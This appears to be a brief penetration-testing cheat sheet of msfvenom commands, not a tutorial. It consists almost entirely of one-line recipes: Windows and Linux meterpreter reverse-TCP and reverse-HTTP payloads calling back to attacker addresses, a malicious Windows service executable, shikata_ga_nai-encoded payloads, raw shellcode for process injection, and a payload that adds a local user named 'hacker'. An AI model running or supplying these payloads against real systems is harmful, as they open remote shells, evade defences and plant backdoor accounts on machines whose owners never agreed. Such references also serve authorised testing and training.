🐍MSFVENOM

Create Windows Service

sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.36.145 LPORT=4444 -f exe-service -o new-service.exe

C++ Shellcode

credit: https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=External_IPv4_Redirector LPORT=80 -f c

Generates an encoded x86-64 reverse tcp meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

Shellcode

Windows Meterpreter Reverse TCP Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>

Create bin file for process injection

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=7777 -f raw -o meter32.bin exitfunc=thread
shell> inject_process.exe PID meter32.bin

Linux Meterpreter Reverse TCP Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language

Linux Meterpreter Reverse HTTP Shellcode

sudo msfvenom -p linux/x64/meterpreter_reverse_http LHOST=10.10.15.61 LPORT=4439 -f elf > shell.elf

Create User

msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe

Last updated

Was this helpful?